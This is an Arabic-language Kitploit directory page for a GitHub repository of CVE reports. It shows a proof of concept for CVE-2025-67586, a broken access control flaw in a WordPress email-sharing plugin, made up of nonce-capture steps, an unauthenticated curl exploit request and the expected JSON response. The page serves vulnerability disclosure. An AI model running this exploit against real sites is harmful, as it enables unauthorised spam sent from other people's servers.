Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE — تقارير تحليلية لـ (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986) | Kitploit
أدوات/GitHubGitHub/r0xtsec/cve
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubr0xtsec/cve

CVE

تقارير تحليلية لـ (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE

كتابات عن (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)

root@kitploit:~
--------------   CVE-2025-67586 استغلال - إثبات المفهوم   --------------
  • عنوان الاستغلال: إضافة WordPress 5.2.0 - التحكم في الوصول المكسور
  • رابط البرنامج: https://wordpress.org/plugins/highlight-and-share/
  • الإصدار: <= 5.2.0 (مطلوب)
  • CVE: CVE-2025-67586

==> الوصف توجد ثغرة في التحكم في الوصول في إضافة WordPress مطورة بواسطة DLX Plugins. تعرض الإجراء AJAX غير المصادق عليه الذي يسمح للمهاجمين بإساءة استخدام وظيفة "المشاركة عبر البريد الإلكتروني" دون فحوصات أذونات مناسبة.

يمكن للمهاجم غير المصادق عليه إعادة استخدام nonce صالح لمنشور لتشغيل طلبات مشاركة البريد الإلكتروني، مما يؤدي إلى إرسال بريد إلكتروني غير مصرح به (بريد عشوائي / إساءة استخدام) دون مصادقة المستخدم.

==> الصلاحيات المطلوبة لا شيء (غير مصادق عليه)

==> إثبات المفهوم (PoC)

الخطوة 1: اختر موقع ويب به الإضافة المثبتة

الخطوة 2: الحصول على nonce صالح

  1. افتح منشورًا عامًا.
  2. حدد النص وانقر على المشاركة عبر البريد الإلكتروني.
  3. افتح أدوات المطور → الشبكة → XHR.
  4. أرسل البريد الإلكتروني مرة واحدة.
  5. التقط الطلب الذي يحتوي على: action=has_email_social_modal nonce= post_id=

الخطوة 3: الاستغلال عبر طلب غير مصادق عليه

أمر bash: (استبدل رابط الموقع، رابط المنشور، و nonce)

curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php'
-d 'action=has_email_form_submission'
-d 'formData[postId]='
-d 'formData[permalink]=http://localhost/?p='
-d 'formData[nonce]='
-d 'formData[toEmail]=[email protected]'
-d 'formData[subject]=PoC'
-d 'formData[shareText]=POC test'
-d 'formData[emailShareType]=selection'
--compressed

--> استجابة JSON المتوقعة:

{ "success": true, "data": { "errors": false, "message_title": "This post has been shared!", "message_body": "You have shared this post with [email protected]", "message_subject": "[Shared Post] ", "message_source_name": "Site Name", "message_source_email": "[email protected]" } }

تنزيل الأداة